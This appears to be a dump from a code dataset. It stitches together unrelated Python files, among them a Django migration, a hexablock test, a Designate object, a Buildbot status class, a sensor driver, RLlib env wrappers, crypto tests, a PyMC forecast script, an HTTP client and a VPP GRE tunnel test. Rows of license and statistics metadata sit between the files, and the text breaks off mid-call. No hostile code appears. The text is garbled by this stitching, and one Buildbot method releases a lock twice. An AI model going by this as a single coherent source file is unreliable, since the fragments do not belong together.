name='rastrexo',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='media_links', to='core.Rastrexo'),
),
migrations.AlterField(
model_name='rastrexo',
name='organization',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='rastrexos', to='core.Organization', verbose_name='Organización'),
),
migrations.AlterField(
model_name='rastrexo',
name='season',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='rastrexos', to='core.Season'),
),
migrations.AlterField(
model_name='teammatch',
name='rastrexo',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='team_matches', to='core.Rastrexo'),
),
]
|
gpl-3.0
| -6,761,579,042,721,352,000
| 37.564103
| 183
| 0.621011
| false
| 3.886305
| false
| false
| false
|
FedoraScientific/salome-hexablock
|
doc/test_doc/make_transformation/make_scale.py
|
1
|
1308
|
# -*- coding: latin-1 -*-
# Copyright (C) 2009-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
####### Test make scale ###############
import hexablock
doc = hexablock.addDocument ("default")
ori = doc.addVertex ( 0, 0, 0)
vz = doc.addVector ( 0, 0, 1)
vx = doc.addVector ( 1 ,0, 0)
dr = 1
da = 360
dl = 1
nr = 1
na = 6
nl = 1
grid = doc.makeCylindrical (ori, vx,vz, dr,da,dl, nr,na,nl, False)
dest = doc.addVertex (15, 0, 0)
grid2 = doc.makeScale (grid, dest, 0.5)
##### doc .saveVtk ("make_scale.vtk")
|
lgpl-2.1
| -8,208,037,687,077,105,000
| 28.727273
| 81
| 0.692661
| false
| 3.198044
| false
| false
| false
|
openstack/designate
|
designate/objects/zone_import.py
|
1
|
1570
|
# Copyright 2015 Rackspace Inc.
#
# Author: Tim Simmons <tim.simmons@rackspace.com>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from designate.objects import base
from designate.objects import fields
@base.DesignateRegistry.register
class ZoneImport(base.DictObjectMixin, base.PersistentObjectMixin,
base.DesignateObject):
fields = {
'status': fields.EnumField(nullable=True,
valid_values=["ACTIVE", "PENDING",
"DELETED", "ERROR", "COMPLETE"]
),
'task_type': fields.EnumField(nullable=True,
valid_values=["IMPORT"]
),
'tenant_id': fields.StringFields(nullable=True),
'message': fields.StringFields(nullable=True, maxLength=160),
'zone_id': fields.UUIDFields(nullable=True)
}
@base.DesignateRegistry.register
class ZoneImportList(base.ListObjectMixin, base.DesignateObject,
base.PagedListObjectMixin):
LIST_ITEM_TYPE = ZoneImport
fields = {
'objects': fields.ListOfObjectsField('ZoneImport'),
}
|
apache-2.0
| -6,399,281,235,386,972,000
| 34.681818
| 75
| 0.689809
| false
| 4.056848
| false
| false
| false
|
anish/buildbot
|
master/buildbot/status/buildrequest.py
|
1
|
4850
|
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.internet import defer
from twisted.python import log
from zope.interface import implementer
from buildbot import interfaces
from buildbot.util.eventual import eventually
@implementer(interfaces.IBuildRequestStatus)
class BuildRequestStatus:
def __init__(self, buildername, brid, status, brdict=None):
self.buildername = buildername
self.brid = brid
self.status = status
self.master = status.master
self._brdict = brdict
self._buildrequest = None
self._buildrequest_lock = defer.DeferredLock()
@defer.inlineCallbacks
def _getBuildRequest(self):
"""
Get the underlying BuildRequest object for this status. This is a slow
operation!
@returns: BuildRequest instance or None, via Deferred
"""
# late binding to avoid an import cycle
from buildbot.process import buildrequest
# this is only set once, so no need to lock if we already have it
if self._buildrequest:
return self._buildrequest
yield self._buildrequest_lock.acquire()
try:
if not self._buildrequest:
if self._brdict is None:
self._brdict = (
yield self.master.db.buildrequests.getBuildRequest(
self.brid))
br = yield buildrequest.BuildRequest.fromBrdict(self.master,
self._brdict)
self._buildrequest = br
finally:
self._buildrequest_lock.release()
self._buildrequest_lock.release()
return self._buildrequest
def buildStarted(self, build):
self.status._buildrequest_buildStarted(build.status)
self.builds.append(build.status)
# methods called by our clients
@defer.inlineCallbacks
def getBsid(self):
br = yield self._getBuildRequest()
return br.bsid
@defer.inlineCallbacks
def getBuildProperties(self):
br = yield self._getBuildRequest()
return br.properties
def getSourceStamp(self):
# TODO..
return defer.succeed(None)
def getBuilderName(self):
return self.buildername
@defer.inlineCallbacks
def getBuilds(self):
builder = self.status.getBuilder(self.getBuilderName())
builds = []
bdicts = yield self.master.db.builds.getBuilds(buildrequestid=self.brid)
buildnums = sorted([bdict['number'] for bdict in bdicts])
for buildnum in buildnums:
bs = builder.getBuild(buildnum)
if bs:
builds.append(bs)
return builds
def subscribe(self, observer):
d = self.getBuilds()
@d.addCallback
def notify_old(oldbuilds):
for bs in oldbuilds:
eventually(observer, bs)
d.addCallback(lambda _:
self.status._buildrequest_subscribe(self.brid, observer))
d.addErrback(log.err, 'while notifying subscribers')
def unsubscribe(self, observer):
self.status._buildrequest_unsubscribe(self.brid, observer)
@defer.inlineCallbacks
def getSubmitTime(self):
br = yield self._getBuildRequest()
return br.submittedAt
def asDict(self):
result = {}
# Constant
result['source'] = None # not available sync, sorry
result['builderName'] = self.buildername
result['submittedAt'] = None # not available sync, sorry
# Transient
result['builds'] = [] # not available async, sorry
return result
@defer.inlineCallbacks
def asDict_async(self):
result = {}
ss = yield self.getSourceStamp()
result['source'] = ss.asDict()
props = yield self.getBuildProperties()
result['properties'] = props.asList()
result['builderName'] = self.getBuilderName()
result['submittedAt'] = yield self.getSubmitTime()
builds = yield self.getBuilds()
result['builds'] = [build.asDict() for build in builds]
return result
|
gpl-2.0
| -6,598,749,122,687,935,000
| 30.699346
| 80
| 0.632165
| false
| 4.46593
| false
| false
| false
|
rbmj/pyflightcontrol
|
pyflightcontrol/aircraft/mpl3115a2.py
|
1
|
3189
|
from smbus import SMBus
from sys import exit
import os
import time
class MPL3115A2(object):
#I2C ADDRESS/BITS
ADDRESS = (0x60)
#REGISTERS
REGISTER_STATUS = (0x00)
REGISTER_STATUS_TDR = 0x02
REGISTER_STATUS_PDR = 0x04
REGISTER_STATUS_PTDR = 0x08
REGISTER_PRESSURE_MSB = (0x01)
REGISTER_PRESSURE_CSB = (0x02)
REGISTER_PRESSURE_LSB = (0x03)
REGISTER_TEMP_MSB = (0x04)
REGISTER_TEMP_LSB = (0x05)
REGISTER_DR_STATUS = (0x06)
OUT_P_DELTA_MSB = (0x07)
OUT_P_DELTA_CSB = (0x08)
OUT_P_DELTA_LSB = (0x09)
OUT_T_DELTA_MSB = (0x0A)
OUT_T_DELTA_LSB = (0x0B)
BAR_IN_MSB = (0x14)
WHOAMI = (0x0C)
#BITS
PT_DATA_CFG = 0x13
PT_DATA_CFG_TDEFE = 0x01
PT_DATA_CFG_PDEFE = 0x02
PT_DATA_CFG_DREM = 0x04
CTRL_REG1 = (0x26)
CTRL_REG1_SBYB = 0x01
CTRL_REG1_OST = 0x02
CTRL_REG1_RST = 0x04
CTRL_REG1_OS1 = 0x00
CTRL_REG1_OS2 = 0x08
CTRL_REG1_OS4 = 0x10
CTRL_REG1_OS8 = 0x18
CTRL_REG1_OS16 = 0x20
CTRL_REG1_OS32 = 0x28
CTRL_REG1_OS64 = 0x30
CTRL_REG1_OS128 = 0x38
CTRL_REG1_RAW = 0x40
CTRL_REG1_ALT = 0x80
CTRL_REG1_BAR = 0x00
CTRL_REG2 = (0x27)
CTRL_REG3 = (0x28)
CTRL_REG4 = (0x29)
CTRL_REG5 = (0x2A)
REGISTER_STARTCONVERSION = (0x12)
def __init__(self):
os.system('echo -n 1 > ' +
'/sys/module/i2c_bcm2708/parameters/combined')
self._bus = SMBus(1)
whoami = self._bus.read_byte_data(MPL3115A2.ADDRESS,
MPL3115A2.WHOAMI)
if whoami != 0xc4:
raise #FIXME
# Enable Event Flags
self._bus.write_byte_data(MPL3115A2.ADDRESS,
MPL3115A2.PT_DATA_CFG, 0x07)
self.pressure = 0
self.temperature = 0
def poll(self):
self._bus.read_byte_data(MPL3115A2.ADDRESS, MPL3115A2.CTRL_REG1)
self._bus.write_byte_data(
MPL3115A2.ADDRESS,
MPL3115A2.CTRL_REG1,
MPL3115A2.CTRL_REG1_OST |
MPL3115A2.CTRL_REG1_OS8)
while True:
reg = self._bus.read_byte_data(MPL3115A2.ADDRESS,
MPL3115A2.REGISTER_STATUS)
if (reg & MPL3115A2.REGISTER_STATUS_PTDR) != 0:
break
msb, csb, lsb = self._bus.read_i2c_block_data(MPL3115A2.ADDRESS,
MPL3115A2.REGISTER_PRESSURE_MSB, 3)
self.pressure = ((msb<<16) | (csb<<8) | lsb) / 64.
# convert to psf
self.pressure = self.pressure*0.02089
msb, lsb = self._bus.read_i2c_block_data(MPL3115A2.ADDRESS,
MPL3115A2.REGISTER_TEMP_MSB, 2)
self.temperature = (msb << 8) | lsb
# check sign
if self.temperature > (1<<15):
self.temperature = self.temperature - (1<<16)
# make fractional and convert to kelvin
self.temperature = (self.temperature/256.) + 273.15
# convert to rankine
self.temperature = self.temperature*1.8
if __name__ == '__main__':
dev = MPL3115A2()
while True:
dev.poll()
print('p {}\tT {}'.format(dev.pressure, dev.temperature))
time.sleep(0.05)
|
apache-2.0
| -4,089,819,986,893,017,600
| 26.973684
| 72
| 0.570398
| false
| 2.633361
| false
| false
| false
|
ray-project/ray
|
rllib/examples/env/mbmpo_env.py
|
1
|
3338
|
from gym.envs.classic_control import PendulumEnv, CartPoleEnv
import numpy as np
# MuJoCo may not be installed.
HalfCheetahEnv = HopperEnv = None
try:
from gym.envs.mujoco import HalfCheetahEnv, HopperEnv
except Exception:
pass
class CartPoleWrapper(CartPoleEnv):
"""Wrapper for the Cartpole-v0 environment.
Adds an additional `reward` method for some model-based RL algos (e.g.
MB-MPO).
"""
def reward(self, obs, action, obs_next):
# obs = batch * [pos, vel, angle, rotation_rate]
x = obs_next[:, 0]
theta = obs_next[:, 2]
# 1.0 if we are still on, 0.0 if we are terminated due to bounds
# (angular or x-axis) being breached.
rew = 1.0 - ((x < -self.x_threshold) | (x > self.x_threshold) |
(theta < -self.theta_threshold_radians) |
(theta > self.theta_threshold_radians)).astype(np.float32)
return rew
class PendulumWrapper(PendulumEnv):
"""Wrapper for the Pendulum-v0 environment.
Adds an additional `reward` method for some model-based RL algos (e.g.
MB-MPO).
"""
def reward(self, obs, action, obs_next):
# obs = [cos(theta), sin(theta), dtheta/dt]
# To get the angle back from obs: atan2(sin(theta), cos(theta)).
theta = np.arctan2(
np.clip(obs[:, 1], -1.0, 1.0), np.clip(obs[:, 0], -1.0, 1.0))
# Do everything in (B,) space (single theta-, action- and
# reward values).
a = np.clip(action, -self.max_torque, self.max_torque)[0]
costs = self.angle_normalize(theta) ** 2 + \
0.1 * obs[:, 2] ** 2 + 0.001 * (a ** 2)
return -costs
@staticmethod
def angle_normalize(x):
return (((x + np.pi) % (2 * np.pi)) - np.pi)
class HalfCheetahWrapper(HalfCheetahEnv or object):
"""Wrapper for the MuJoCo HalfCheetah-v2 environment.
Adds an additional `reward` method for some model-based RL algos (e.g.
MB-MPO).
"""
def reward(self, obs, action, obs_next):
if obs.ndim == 2 and action.ndim == 2:
assert obs.shape == obs_next.shape
forward_vel = obs_next[:, 8]
ctrl_cost = 0.1 * np.sum(np.square(action), axis=1)
reward = forward_vel - ctrl_cost
return np.minimum(np.maximum(-1000.0, reward), 1000.0)
else:
forward_vel = obs_next[8]
ctrl_cost = 0.1 * np.square(action).sum()
reward = forward_vel - ctrl_cost
return np.minimum(np.maximum(-1000.0, reward), 1000.0)
class HopperWrapper(HopperEnv or object):
"""Wrapper for the MuJoCo Hopper-v2 environment.
Adds an additional `reward` method for some model-based RL algos (e.g.
MB-MPO).
"""
def reward(self, obs, action, obs_next):
alive_bonus = 1.0
assert obs.ndim == 2 and action.ndim == 2
assert (obs.shape == obs_next.shape
and action.shape[0] == obs.shape[0])
vel = obs_next[:, 5]
ctrl_cost = 1e-3 * np.sum(np.square(action), axis=1)
reward = vel + alive_bonus - ctrl_cost
return np.minimum(np.maximum(-1000.0, reward), 1000.0)
if __name__ == "__main__":
env = PendulumWrapper()
env.reset()
for _ in range(100):
env.step(env.action_space.sample())
env.render()
|
apache-2.0
| 4,605,161,927,756,585,500
| 31.72549
| 79
| 0.584182
| false
| 3.218901
| false
| false
| false
|
EliAndrewC/ensconce
|
tests/unit/crypto/test_ephemeral.py
|
1
|
3398
|
import os
import hashlib
from ensconce.crypto import MasterKey, state, util as crypto_util
from ensconce import exc
from tests import BaseModelTest
class EphemeralStateTest(BaseModelTest):
def setUp(self):
super(EphemeralStateTest, self).setUp()
# We need to reset the state
state.secret_key = None
#crypto_util.clear_key_metadata()
def _set_key(self, encryption_key, signing_key):
"""
Sets a key on the ephemeral store; this method also takes care of
setting up the key metadata (otherwise loading mismatched key will fail).
"""
state.secret_key = None
key = MasterKey(encryption_key=encryption_key, signing_key=signing_key)
crypto_util.initialize_key_metadata(key=key, salt=os.urandom(8), force_overwrite=True)
state.secret_key = key
def tearDown(self):
# Remove key_metadata rows so that they can be re-initialized.
super(EphemeralStateTest, self).tearDown()
crypto_util.initialize_key_metadata(key=self.SECRET_KEY, salt=os.urandom(8), force_overwrite=True)
def test_initialized(self):
""" Test ephemeral state initialization check. """
self.assertFalse(state.initialized)
self._set_key(hashlib.sha256('secret').digest(), hashlib.sha256('sign').digest())
self.assertTrue(state.initialized)
def test_access_uninitialized(self):
""" Test accessing uninitialized secret_key """
state.secret_key = None
with self.assertRaises(exc.CryptoNotInitialized):
state.secret_key
def test_already_initialized(self):
""" Test already-initialized ephemeral state key setting. """
self._set_key(hashlib.sha256('secret').digest(), hashlib.sha256('sign').digest())
ekey = hashlib.sha256('secret').digest()
skey = hashlib.sha256('sign').digest()
state.secret_key = MasterKey(ekey, skey)
def test_set_different_key(self):
""" Ensure that setting a new encryption key fails validation. """
state.secret_key = None
ekey = hashlib.sha256('new-key').digest()
skey = hashlib.sha256('new-key').digest()
with self.assertRaises(exc.IncorrectKey):
state.secret_key = MasterKey(ekey, skey)
def test_set_different_signing_key(self):
""" Ensure that setting a new signing key fails validation. """
self._set_key(hashlib.sha256('secret').digest(), hashlib.sha256('sign').digest())
ekey = hashlib.sha256('secret').digest()
skey = hashlib.sha256('new-key').digest()
with self.assertRaises(exc.IncorrectKey):
state.secret_key = MasterKey(ekey, skey)
def test_set_incorrect_size(self):
""" Test setting an incorrect sized key. """
# We only support 32-char keys.
with self.assertRaises(ValueError):
state.secret_key = ""
with self.assertRaises(ValueError):
state.secret_key = hashlib.sha384('secret').digest()
with self.assertRaises(ValueError):
state.secret_key = hashlib.sha1().digest()
def test_set_incorrect_type(self):
""" Test setting with incorrect type. """
with self.assertRaises(TypeError):
state.secret_key = hashlib.sha1()
|
bsd-3-clause
| 6,698,764,096,634,126,000
| 39.464286
| 106
| 0.628605
| false
| 4.195062
| true
| false
| false
|
jkominek/scicasting
|
hurricanes/firststorm.py
|
1
|
2737
|
#!/usr/bin/python
from datetime import datetime, date, timedelta
from pymc import *
import numpy as np
dates = [ date(1992, 4, 21),
date(1993, 5, 31),
date(1994, 6, 30),
date(1995, 6, 2),
date(1996, 6, 17),
date(1997, 6, 1),
date(1998, 7, 27),
date(1999, 6, 11),
date(2000, 6, 7),
date(2001, 6, 4),
date(2002, 7, 14),
date(2003, 4, 20),
date(2004, 7, 31),
date(2005, 6, 8),
date(2006, 6, 10),
date(2007, 5, 9),
date(2008, 5, 31),
date(2009, 5, 28),
date(2010, 6, 25),
date(2011, 6, 28),
date(2012, 5, 19),
date(2013, 6, 5) ]
relative_days = [ ]
for d in dates:
end_of_june = date(d.year, 6, 30)
relative_days.append((d - end_of_june).days)
days_array = np.array(relative_days)
simple_mean = np.mean(days_array)
simple_stddev = np.std(days_array)
def predict(today, FORECAST_CLEAR):
days_mean = Uniform('days_mean', lower=-90, upper=90)
days_tau = Uniform('days_tau', upper=1.0, lower=1.0/(simple_stddev*2)**2,
value=1.0/simple_stddev**2)
days = Normal('days', mu=days_mean, tau=days_tau,
value=days_array, observed=True)
next_year = Normal('next_year', mu=days_mean, tau=days_tau)
end_of_june = date(today.year, 6, 30)
today = (today - end_of_june).days
@deterministic()
def before_july(next_year=next_year):
return next_year<=0
@potential()
def not_before_today(next_year=next_year):
if next_year <= (today + FORECAST_CLEAR):
return -1e10
else:
return 0.0
model = Model([not_before_today, before_july, days, days_mean, days_tau])
M = MCMC(model)
M.sample(iter=70000, burn=10000, verbose=0, progress_bar=False)
return M
# http://www.nhc.noaa.gov/
# True if there is nothing with 48-hour formation
# potential on the map
FORECAST_48_HOUR_CLEAR = False
M = predict(date.today(), 2 if FORECAST_48_HOUR_CLEAR else 0)
print "Today"
print np.mean(M.trace('before_july')[:])
M = predict(date.today()+timedelta(1), 1.5 if FORECAST_48_HOUR_CLEAR else 0)
print "Tomorrow"
print np.mean(M.trace('before_july')[:])
M = predict(date.today()+timedelta(2), 0.25 if FORECAST_48_HOUR_CLEAR else 0)
print "2 days from now"
print np.mean(M.trace('before_july')[:])
M = predict(date.today()+timedelta(3), 0.0 if FORECAST_48_HOUR_CLEAR else 0)
print "3 days from now"
print np.mean(M.trace('before_july')[:])
M = predict(date.today()+timedelta(4), 0.0 if FORECAST_48_HOUR_CLEAR else 0)
print "4 days from now"
print np.mean(M.trace('before_july')[:])
|
isc
| 4,998,649,028,677,647,000
| 28.117021
| 77
| 0.583851
| false
| 2.896296
| false
| false
| false
|
jacobian-archive/python-hdcloud
|
hdcloud/client.py
|
1
|
1893
|
import httplib2
import urlparse
import urllib
import hdcloud
from . import exceptions
try:
import json
except ImportError:
import simplejson as json
class HDCloudClient(httplib2.Http):
USER_AGENT = 'python-hdcloud/%s' % hdcloud.__version__
BASE_URL = 'http://hdcloud.com/api/v1/'
def __init__(self, username, password):
super(HDCloudClient, self).__init__()
self.add_credentials(username, password)
self.force_exception_to_status_code = True
def request(self, url, method, *args, **kwargs):
url = urlparse.urljoin(self.BASE_URL, url.lstrip('/'))
# Make sure to hardcode requests for JSON
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
path = "%s.json" % path
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
# Add User-Agent headers
kwargs.setdefault('headers', {})
kwargs['headers']['User-Agent'] = self.USER_AGENT
resp, body = self._hdc_request(url, method, *args, **kwargs)
if resp.status in (400, 401, 403, 404, 406, 413, 500):
raise exceptions.from_response(resp, body)
return resp, body
def _hdc_request(self, url, method, *args, **kwargs):
# Separate method for mocking and testing.
resp, body = super(HDCloudClient, self).request(url, method, *args, **kwargs)
body = json.loads(body) if body else None
return resp, body
def get(self, url, **kwargs):
return self.request(url, 'GET', **kwargs)
def post(self, url, **kwargs):
return self.request(url, 'POST', **kwargs)
def put(self, url, **kwargs):
return self.request(url, 'PUT', **kwargs)
def delete(self, url, **kwargs):
return self.request(url, 'DELETE', **kwargs)
|
bsd-3-clause
| -7,586,979,735,969,499,000
| 32.210526
| 85
| 0.595351
| false
| 3.903093
| false
| false
| false
|
licko/vpp-1701-licko
|
test/test_gre.py
|
1
|
23296
|
#!/usr/bin/env python
import unittest
from logging import *
from framework import VppTestCase, VppTestRunner
from vpp_sub_interface import VppDot1QSubint
from vpp_gre_interface import VppGreInterface
from vpp_ip_route import IpRoute, RoutePath
from vpp_papi_provider import L2_VTR_OP
from scapy.packet import Raw
from scapy.layers.l2 import Ether, Dot1Q, GRE
from scapy.layers.inet import IP, UDP
from scapy.layers.inet6 import IPv6
from scapy.volatile import RandMAC, RandIP
from util import ppp, ppc
class TestGRE(VppTestCase):
""" GRE Test Case """
@classmethod
def setUpClass(cls):
super(TestGRE, cls).setUpClass()
def setUp(self):
super(TestGRE, self).setUp()
# create 2 pg interfaces - set one in a non-default table.
self.create_pg_interfaces(range(2))
self.pg1.set_table_ip4(1)
for i in self.pg_interfaces:
i.admin_up()
i.config_ip4()
i.resolve_arp()
def tearDown(self):
super(TestGRE, self).tearDown()
def create_stream_ip4(self, src_if, src_ip, dst_ip):
pkts = []
for i in range(0, 257):
info = self.create_packet_info(src_if.sw_if_index,
src_if.sw_if_index)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=src_ip, dst=dst_ip) /
UDP(sport=1234, dport=1234) /
Raw(payload))
info.data = p.copy()
pkts.append(p)
return pkts
def create_tunnel_stream_4o4(self, src_if,
tunnel_src, tunnel_dst,
src_ip, dst_ip):
pkts = []
for i in range(0, 257):
info = self.create_packet_info(src_if.sw_if_index,
src_if.sw_if_index)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=tunnel_src, dst=tunnel_dst) /
GRE() /
IP(src=src_ip, dst=dst_ip) /
UDP(sport=1234, dport=1234) /
Raw(payload))
info.data = p.copy()
pkts.append(p)
return pkts
def create_tunnel_stream_6o4(self, src_if,
tunnel_src, tunnel_dst,
src_ip, dst_ip):
pkts = []
for i in range(0, 257):
info = self.create_packet_info(src_if.sw_if_index,
src_if.sw_if_index)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=tunnel_src, dst=tunnel_dst) /
GRE() /
IPv6(src=src_ip, dst=dst_ip) /
UDP(sport=1234, dport=1234) /
Raw(payload))
info.data = p.copy()
pkts.append(p)
return pkts
def create_tunnel_stream_l2o4(self, src_if,
tunnel_src, tunnel_dst):
pkts = []
for i in range(0, 257):
info = self.create_packet_info(src_if.sw_if_index,
src_if.sw_if_index)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=tunnel_src, dst=tunnel_dst) /
GRE() /
Ether(dst=RandMAC('*:*:*:*:*:*'),
src=RandMAC('*:*:*:*:*:*')) /
IP(src=str(RandIP()), dst=str(RandIP())) /
UDP(sport=1234, dport=1234) /
Raw(payload))
info.data = p.copy()
pkts.append(p)
return pkts
def create_tunnel_stream_vlano4(self, src_if,
tunnel_src, tunnel_dst, vlan):
pkts = []
for i in range(0, 257):
info = self.create_packet_info(src_if.sw_if_index,
src_if.sw_if_index)
payload = self.info_to_payload(info)
p = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=tunnel_src, dst=tunnel_dst) /
GRE() /
Ether(dst=RandMAC('*:*:*:*:*:*'),
src=RandMAC('*:*:*:*:*:*')) /
Dot1Q(vlan=vlan) /
IP(src=str(RandIP()), dst=str(RandIP())) /
UDP(sport=1234, dport=1234) /
Raw(payload))
info.data = p.copy()
pkts.append(p)
return pkts
def verify_tunneled_4o4(self, src_if, capture, sent,
tunnel_src, tunnel_dst):
self.assertEqual(len(capture), len(sent))
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IP]
self.assertEqual(rx_ip.src, tunnel_src)
self.assertEqual(rx_ip.dst, tunnel_dst)
rx_gre = rx[GRE]
rx_ip = rx_gre[IP]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
# IP processing post pop has decremented the TTL
self.assertEqual(rx_ip.ttl + 1, tx_ip.ttl)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def verify_tunneled_l2o4(self, src_if, capture, sent,
tunnel_src, tunnel_dst):
self.assertEqual(len(capture), len(sent))
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IP]
self.assertEqual(rx_ip.src, tunnel_src)
self.assertEqual(rx_ip.dst, tunnel_dst)
rx_gre = rx[GRE]
rx_l2 = rx_gre[Ether]
rx_ip = rx_l2[IP]
tx_gre = tx[GRE]
tx_l2 = tx_gre[Ether]
tx_ip = tx_l2[IP]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
# bridged, not L3 forwarded, so no TTL decrement
self.assertEqual(rx_ip.ttl, tx_ip.ttl)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def verify_tunneled_vlano4(self, src_if, capture, sent,
tunnel_src, tunnel_dst, vlan):
try:
self.assertEqual(len(capture), len(sent))
except:
ppc("Unexpected packets captured:", capture)
raise
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IP]
self.assertEqual(rx_ip.src, tunnel_src)
self.assertEqual(rx_ip.dst, tunnel_dst)
rx_gre = rx[GRE]
rx_l2 = rx_gre[Ether]
rx_vlan = rx_l2[Dot1Q]
rx_ip = rx_l2[IP]
self.assertEqual(rx_vlan.vlan, vlan)
tx_gre = tx[GRE]
tx_l2 = tx_gre[Ether]
tx_ip = tx_l2[IP]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
# bridged, not L3 forwarded, so no TTL decrement
self.assertEqual(rx_ip.ttl, tx_ip.ttl)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def verify_decapped_4o4(self, src_if, capture, sent):
self.assertEqual(len(capture), len(sent))
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IP]
tx_gre = tx[GRE]
tx_ip = tx_gre[IP]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
# IP processing post pop has decremented the TTL
self.assertEqual(rx_ip.ttl + 1, tx_ip.ttl)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def verify_decapped_6o4(self, src_if, capture, sent):
self.assertEqual(len(capture), len(sent))
for i in range(len(capture)):
try:
tx = sent[i]
rx = capture[i]
tx_ip = tx[IP]
rx_ip = rx[IPv6]
tx_gre = tx[GRE]
tx_ip = tx_gre[IPv6]
self.assertEqual(rx_ip.src, tx_ip.src)
self.assertEqual(rx_ip.dst, tx_ip.dst)
self.assertEqual(rx_ip.hlim + 1, tx_ip.hlim)
except:
self.logger.error(ppp("Rx:", rx))
self.logger.error(ppp("Tx:", tx))
raise
def test_gre(self):
""" GRE tunnel Tests """
#
# Create an L3 GRE tunnel.
# - set it admin up
# - assign an IP Addres
# - Add a route via the tunnel
#
gre_if = VppGreInterface(self,
self.pg0.local_ip4,
"1.1.1.2")
gre_if.add_vpp_config()
#
# The double create (create the same tunnel twice) should fail,
# and we should still be able to use the original
#
try:
gre_if.add_vpp_config()
except Exception:
pass
else:
self.fail("Double GRE tunnel add does not fail")
gre_if.admin_up()
gre_if.config_ip4()
route_via_tun = IpRoute(self, "4.4.4.4", 32,
[RoutePath("0.0.0.0", gre_if.sw_if_index)])
route_via_tun.add_vpp_config()
#
# Send a packet stream that is routed into the tunnel
# - they are all dropped since the tunnel's desintation IP
# is unresolved - or resolves via the default route - which
# which is a drop.
#
tx = self.create_stream_ip4(self.pg0, "5.5.5.5", "4.4.4.4")
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured(
remark="GRE packets forwarded without DIP resolved")
#
# Add a route that resolves the tunnel's destination
#
route_tun_dst = IpRoute(self, "1.1.1.2", 32,
[RoutePath(self.pg0.remote_ip4,
self.pg0.sw_if_index)])
route_tun_dst.add_vpp_config()
#
# Send a packet stream that is routed into the tunnel
# - packets are GRE encapped
#
self.vapi.cli("clear trace")
tx = self.create_stream_ip4(self.pg0, "5.5.5.5", "4.4.4.4")
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_tunneled_4o4(self.pg0, rx, tx,
self.pg0.local_ip4, "1.1.1.2")
#
# Send tunneled packets that match the created tunnel and
# are decapped and forwarded
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_4o4(self.pg0,
"1.1.1.2",
self.pg0.local_ip4,
self.pg0.local_ip4,
self.pg0.remote_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
rx = self.pg0.get_capture()
self.verify_decapped_4o4(self.pg0, rx, tx)
#
# Send tunneled packets that do not match the tunnel's src
#
self.vapi.cli("clear trace")
tx = self.create_tunnel_stream_4o4(self.pg0,
"1.1.1.3",
self.pg0.local_ip4,
self.pg0.local_ip4,
self.pg0.remote_ip4)
self.pg0.add_stream(tx)
self.pg_enable_capture(self.pg_interfaces)
self.pg_start()
self.pg0.assert_nothing_captured(
